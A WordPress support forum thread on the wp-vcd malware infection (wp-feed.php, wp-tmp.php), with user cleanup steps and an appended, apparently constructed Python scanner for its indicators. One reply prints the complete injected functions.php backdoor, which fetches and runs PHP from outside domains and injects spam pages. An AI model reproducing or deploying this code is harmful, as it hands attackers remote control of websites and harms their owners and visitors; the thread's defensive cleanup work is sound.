Title: wp-feed.php
Last modified: September 27, 2017

---

# wp-feed.php

 *  Resolved [Rik0399](https://wordpress.org/support/users/rik0399/)
 * (@rik0399)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/wp-feed-php/)
 * Hi,
 * I keep getting a message saying ‘../wp-includes/wp-feed.php’ is not part of the
   WordPress installation, in which Wordfence suggests it’s malicious?
 * So I delete it and then it automatically re-creates itself?
 * Any ideas please?

Viewing 15 replies - 1 through 15 (of 23 total)


 *  Moderator [James Huff](https://wordpress.org/support/users/macmanx/)
 * (@macmanx)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9537263)
 * The report from Wordfence is definitely correct.
 * I recommend reporting the problem at [https://wordpress.org/support/plugin/wordfence](https://wordpress.org/support/plugin/wordfence)
   so the plugin’s developers and support community can help you with this.
 * Alternatively, carefully follow [this guide](https://codex.wordpress.org/FAQ_My_site_was_hacked).
   When you’re done, you may want to implement some (if not all) of [the recommended security measures](https://codex.wordpress.org/Hardening_WordPress).
 *  [jerodbarlow](https://wordpress.org/support/users/jerodbarlow/)
 * (@jerodbarlow)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9571360)
 * Hi James and Rik0399,
 * We’ve recently discovered this is adware on a site we operate but are having 
   a hard time finding the code responsible. What we do know is that this little
   bug basically creates the wp-feed.php file and blacklists any IP address that
   is tied to a logged-in user. So if you log into WordPress on your site, you will
   no longer see the spam ads.
 * However, IP addresses that have never logged into the site will definitely receive
   the ads and will sometimes be redirected off the site altogether.
 * Just thought I’d post in case you guys are able to find the root code responsible.
   We’re working through our files now hoping to solve the problem.
 * Jerod
 *  Thread Starter [Rik0399](https://wordpress.org/support/users/rik0399/)
 * (@rik0399)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9571445)
 * Hi,
 * Thanks for that,
 * I’m working through it all but so far, no joy.
 *  [paolopanatta](https://wordpress.org/support/users/paolopanatta/)
 * (@paolopanatta)
 * [8 years, 6 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9627845)
 * Try if it’s a WP Rocket action/restoring.
 *  [itsmrkim](https://wordpress.org/support/users/itsmrkim/)
 * (@itsmrkim)
 * [8 years, 6 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9631081)
 * Hey guys, I’m currently having the same issue on my site, however it is only 
   affecting certain types of users: Only affects Windows users for desktop, and
   affecting all users on mobile / tablet. Have you guys been able to find the root
   cause / script for this issue?
 * Cheers,
    Sam K.
    -  This reply was modified 8 years, 6 months ago by [itsmrkim](https://wordpress.org/support/users/itsmrkim/).
 *  [jerodbarlow](https://wordpress.org/support/users/jerodbarlow/)
 * (@jerodbarlow)
 * [8 years, 6 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9634242)
 * Hi Sam,
 * I can’t remember/find the exact code that we removed, but it was found in our
   functions.php file in the theme, and I’m pretty sure the inflicting code was 
   output and visible on the front-end in the source code of our site.
 * Hope that helps!
 * Jerod
 *  [akodia](https://wordpress.org/support/users/akodia/)
 * (@akodia)
 * [8 years, 6 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9640420)
 * Hello guys,
 * I had the same problem today and I sorted the issue by using the plugin [Anti-Malware Security and Brute-Force Firewall](https://wordpress.org/plugins/gotmls/).
 * It confirmed the infected file was the functions.php file in the current theme
   of the website. Some malicious code had been planted there. The plugin removes
   it and you’re good to go.
 * Kindly try it and let others know if it worked or not for you.
 * All the best.
    M.A
 *  [bmerigan](https://wordpress.org/support/users/bmerigan/)
 * (@bmerigan)
 * [8 years, 5 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9718677)
 * I found wp-feed.php in my wp-includes directory. It is part of a malware infection.
   That file contains the IP addresses of users who have logged in to the WordPress
   site. It doesn’t show the injected ads to users who have authenticated.
 * The files you should check for and delete:
    - wp-feed.php
    - wp-vcd.php
    - wp-tmp.php
    - Multiple copies of class.theme-modules.php
 * And remove a bunch of code from the start of all the functions.php files.
    -  This reply was modified 8 years, 5 months ago by [bmerigan](https://wordpress.org/support/users/bmerigan/).
 *  [bobdesign](https://wordpress.org/support/users/bobdesign/)
 * (@bobdesign)
 * [8 years, 5 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9770967)
 * Just for you, replace the whole functions.php in theme folder in your wp-content
   and anything is fine.
 * There you can find some line with “wp-vcd.php”……this would be the malware.
 * Cheers.
 *  [pacio88](https://wordpress.org/support/users/pacio88/)
 * (@pacio88)
 * [8 years, 3 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9908296)
 * Hey,
    I have the same issue and this topic helped me to solve it – thanks! Below
   is what I did:
    - change all your passwords for all your WPs, FTP, database
    - for each installed WP (I had a few), go to wp-content/themes/YOURTHEME/functions.php
      and check if the front of the code is not suspicious. Mine looks like below:
 *     ```
       <?php
       if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'ac043657a4e80d5afcce1c523ad9e8c0'))
       	{
       $div_code_name="wp_vcd";
       		switch ($_REQUEST['action'])
       			{
   
   
   
       				case 'change_domain';
       					if (isset($_REQUEST['newdomain']))
       						{
   
       							if (!empty($_REQUEST['newdomain']))
       								{
                                                                                  if ($file = @file_get_contents(__FILE__))
       		                                                                    {
                                                                                                        if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                                    {
   
       			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
       			                                                                           @file_put_contents(__FILE__, $file);
       									                           print "true";
                                                                                                                    }
   
       		                                                                    }
       								}
       						}
       				break;
   
       								case 'change_code';
       					if (isset($_REQUEST['newcode']))
       						{
   
       							if (!empty($_REQUEST['newcode']))
       								{
                                                                                  if ($file = @file_get_contents(__FILE__))
       		                                                                    {
                                                                                                        if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                                    {
   
       			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
       			                                                                           @file_put_contents(__FILE__, $file);
       									                           print "true";
                                                                                                                    }
   
       		                                                                    }
       								}
       						}
       				break;
   
       				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
       			}
   
       		die("");
       	}
   
       $div_code_name = "wp_vcd";
       $funcfile      = __FILE__;
       if(!function_exists('theme_temp_setup')) {
           $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
           if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
   
               function file_get_contents_tcurl($url)
               {
                   $ch = curl_init();
                   curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                   curl_setopt($ch, CURLOPT_HEADER, 0);
                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                   curl_setopt($ch, CURLOPT_URL, $url);
                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                   $data = curl_exec($ch);
                   curl_close($ch);
                   return $data;
               }
   
               function theme_temp_setup($phpCode)
               {
                   $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                   $handle   = fopen($tmpfname, "w+");
                  if( fwrite($handle, "<?php\n" . $phpCode))
       		   {
       		   }
       			else
       			{
       			$tmpfname = tempnam('./', "theme_temp_setup");
                   $handle   = fopen($tmpfname, "w+");
       			fwrite($handle, "<?php\n" . $phpCode);
       			}
       			fclose($handle);
                   include $tmpfname;
                   unlink($tmpfname);
                   return get_defined_vars();
               }
   
   
       $wp_auth_key='08b370e35d008b6591dd40b0eec23025';
               if (($tmpcontent = @file_get_contents("http://www.zanons.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
   
                   if (stripos($tmpcontent, $wp_auth_key) !== false) {
                       extract(theme_temp_setup($tmpcontent));
                       @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
   
                       if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                           @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                           if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                               @file_put_contents('wp-tmp.php', $tmpcontent);
                           }
                       }
   
                   }
               }
   
   
               elseif ($tmpcontent = @file_get_contents("http://www.zanons.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
   
       if (stripos($tmpcontent, $wp_auth_key) !== false) {
                       extract(theme_temp_setup($tmpcontent));
                       @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
   
                       if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                           @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                           if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                               @file_put_contents('wp-tmp.php', $tmpcontent);
                           }
                       }
   
                   }
               } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                   extract(theme_temp_setup($tmpcontent));
   
               } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                   extract(theme_temp_setup($tmpcontent)); 
   
               } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                   extract(theme_temp_setup($tmpcontent)); 
   
               } elseif (($tmpcontent = @file_get_contents("http://www.zanons.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
                   extract(theme_temp_setup($tmpcontent)); 
   
               }
   
   
   
   
   
           }
       }
   
       //$start_wp_theme_tmp
   
       //wp_tmp
   
       //$end_wp_theme_tmp
       ?><?php
   
       if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '207025345d762fe3f77e7d5b3e5664a5'))
       	{
       		switch ($_REQUEST['action'])
       			{
       				case 'get_all_links';
       					foreach ($wpdb->get_results('SELECT * FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>post_status</code> = "publish" AND <code>post_type</code> = "post" ORDER BY <code>ID</code> DESC', ARRAY_A) as $data)
       						{
       							$data['code'] = '';
   
       							if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
       								{
       									$data['code'] = $_[1];
       								}
   
       							print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
       						}
       				break;
   
       				case 'set_id_links';
       					if (isset($_REQUEST['data']))
       						{
       							$data = $wpdb -> get_row('SELECT <code>post_content</code> FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>ID</code> = "'.mysql_escape_string($_REQUEST['id']).'"');
   
       							$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
       							if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';
   
       							if ($wpdb->query('UPDATE <code>' . $wpdb->prefix . 'posts</code> SET <code>post_content</code> = "' . mysql_escape_string($post_content) . '" WHERE <code>ID</code> = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
       								{
       									print "true";
       								}
       						}
       				break;
   
       				case 'create_page';
       					if (isset($_REQUEST['remove_page']))
       						{
       							if ($wpdb -> query('DELETE FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'"'))
       								{
       									print "true";
       								}
       						}
       					elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
       						{
       							if ($wpdb -> query('INSERT INTO <code>' . $wpdb->prefix . 'datalist</code> SET <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'", <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string($_REQUEST['content']).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
       								{
       									print "true";
       								}
       						}
       				break;
   
       				default: print "ERROR_WP_ACTION WP_URL_CD";
       			}
   
       		die("");
       	}
   
   
       if ( $wpdb->get_var('SELECT count(*) FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
       	{
       		$data = $wpdb -> get_row('SELECT * FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
       		if ($data -> full_content)
       			{
       				print stripslashes($data -> content);
       			}
       		else
       			{
       				print '<!DOCTYPE html>';
       				print '<html ';
       				language_attributes();
       				print ' class="no-js">';
       				print '<head>';
       				print '<title>'.stripslashes($data -> title).'</title>';
       				print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
       				print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
       				print '<meta name="robots" content="index, follow" />';
       				print '<meta charset="';
       				bloginfo( 'charset' );
       				print '" />';
       				print '<meta name="viewport" content="width=device-width">';
       				print '<link rel="profile" href="http://gmpg.org/xfn/11">';
       				print '<link rel="pingback" href="';
       				bloginfo( 'pingback_url' );
       				print '">';
       				wp_head();
       				print '</head>';
       				print '<body>';
       				print '<div id="content" class="site-content">';
       				print stripslashes($data -> content);
       				get_search_form();
       				get_sidebar();
       				get_footer();
       			}
   
       		exit;
       	}
   
       ?>
       ```
   
 *  - delete the malware beginning
    - go to /wp-includes and check if you have some of those files:
       - wp-tmp.php
       - wp-vcd.php
       - wp-feed.php
       - wp-cd.php
 * If yes, check them; they are probably malware, so delete them.
    - check your website
    - if the problem still occurs, install the Wordfence plugin and check your website
      once again 😉
 *  [locha9066](https://wordpress.org/support/users/locha9066/)
 * (@locha9066)
 * [8 years, 2 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9961019)
 * Hi [@pacio88](https://wordpress.org/support/users/pacio88/), I have the same
   problem.
 * I checked `wp-tmp.php` and it looks like this: [https://pastebin.com/i68AgRPi](https://pastebin.com/i68AgRPi)
 * I read the code; it seems this code wants to redirect all customers who access my site
   to also access their site, to increase rank in many other searches. `setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);`.
 * I deleted the strange code in `function.php` and `wp-tmp.php`, `wp-vcd.php`, `wp-feed.php`,
   `wp-cd.php`. But when I press F5 on my website, it auto-generates `wp-tmp.php`.
   Is there any method to debug where this begins? Any suggestions from you would be
   the solution for me in this case.
 * Domain: [http://www.zanons.xyz/code.php](http://www.zanons.xyz/code.php)
 *  [bmerigan](https://wordpress.org/support/users/bmerigan/)
 * (@bmerigan)
 * [8 years, 2 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9961064)
 * As I said earlier, these files too:
 * Multiple copies of class.theme-modules.php. And remove a bunch of code from the
   start of all the functions.php files.
 * Check ALL of the functions.php files in the theme, and delete ALL of the class.theme-modules.php.
   These can be found in multiple locations in a theme. If the
   theme is loaded before they are all removed then the other files come back.
 *  [locha9066](https://wordpress.org/support/users/locha9066/)
 * (@locha9066)
 * [8 years, 2 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9962886)
 * [@bmerigan](https://wordpress.org/support/users/bmerigan/), do you know where
   the problem begins?
 * I do not upload my source to hosting; it is running on localhost.
 * I don’t know the reason why there is strange code in `function.php`.
 * Is there any method to debug and detect which plugin or theme makes my source code have
   strange code?
 * I am using the themes Flatsome and WPResidence from ThemeForest (both themes have
   the same issues).
 * The plugins that are the same in both themes are: Loco Translate, Yoast SEO.
 *  [bmerigan](https://wordpress.org/support/users/bmerigan/)
 * (@bmerigan)
 * [8 years, 2 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9963225)
 * My experience was from downloading a theme from a ‘free’ site instead of from
   the original creator/source. The site I got it from was dodgy, and only supplying
   infected themes.
 * My experience was that I installed an infected theme which contained the malicious
   code and files.
 *  [entr0phy777](https://wordpress.org/support/users/entr0phy777/)
 * (@entr0phy777)
 * [8 years, 2 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-10029039)
 * In my case it looks like /ajax-search-pro/includes/functions/class.theme-modules.php
   is the only location of class.theme-modules.php.
 * So the plugin source could be suspicious also as bmerigan says.
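
Added example, not part of any post above and not code from WordPress or Wordfence: a read-only Python scanner that lists, in one pass, the file names and injected-code strings reported in this thread. The function names, the marker list and the sample tree are assumptions constructed for illustration.

```python
import os
import tempfile

# File names the thread reports finding inside wp-includes/.
DROPPED_IN_INCLUDES = {"wp-feed.php", "wp-vcd.php", "wp-tmp.php", "wp-cd.php"}
# Loader copies the thread found in several theme and plugin folders.
LOADER_NAME = "class.theme-modules.php"
# Literal strings from the injected functions.php block quoted in the thread.
MARKERS = [b"wp_vcd", b"theme_temp_setup", b"$start_wp_theme_tmp",
           b"wp_cd_code", b"wp-tmp.php", b"wp-vcd.php"]


def scan(root):
    """Return sorted (relative_path, reason) pairs for every indicator under root."""
    findings = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            in_includes = os.path.basename(dirpath) == "wp-includes"
            # wp-tmp.php is flagged anywhere: the quoted code falls back to the
            # theme directory and the working directory if wp-includes fails.
            if name == "wp-tmp.php" or (in_includes and name in DROPPED_IN_INCLUDES):
                findings.add((rel, "dropped file"))
            if name == LOADER_NAME:
                findings.add((rel, "loader copy"))
            try:
                with open(path, "rb") as fh:
                    body = fh.read()
            except OSError:
                continue  # unreadable file: skip it rather than abort the pass
            hits = [m.decode() for m in MARKERS if m in body]
            if hits:
                findings.add((rel, "marker: " + ", ".join(hits)))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed test data: a tiny fake install made of harmless stand-in files."""
    files = {
        "wp-includes/feed.php": "<?php // core file, clean\n",
        "wp-includes/wp-feed.php": "<?php // stand-in for the dropped IP list\n",
        "wp-content/themes/demo/functions.php":
            '<?php\n$div_code_name = "wp_vcd";\n//$start_wp_theme_tmp\n',
        "wp-content/themes/clean/functions.php":
            "<?php add_theme_support('title-tag');\n",
        "wp-content/plugins/demo/includes/class.theme-modules.php":
            "<?php // stand-in\n",
    }
    for rel, text in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)


def demo():
    """Build the constructed tree in a temp dir and return what scan() reports."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan(root)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:40} {rel}")
```

Because the thread reports that the files come back if the theme loads before every copy is removed, review the complete list first and clean all hits together. A marker hit is a lead for manual review, not proof of infection.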


The topic ‘wp-feed.php’ is closed to new replies.

## Tags

 * [hacked](https://wordpress.org/support/topic-tag/hacked/)
 * [problem](https://wordpress.org/support/topic-tag/problem/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 23 replies
 * 15 participants
 * Last reply from: [bmerigan](https://wordpress.org/support/users/bmerigan/)
 * Last activity: [7 years, 8 months ago](https://wordpress.org/support/topic/wp-feed-php/page/2/#post-10592372)
 * Status: resolved

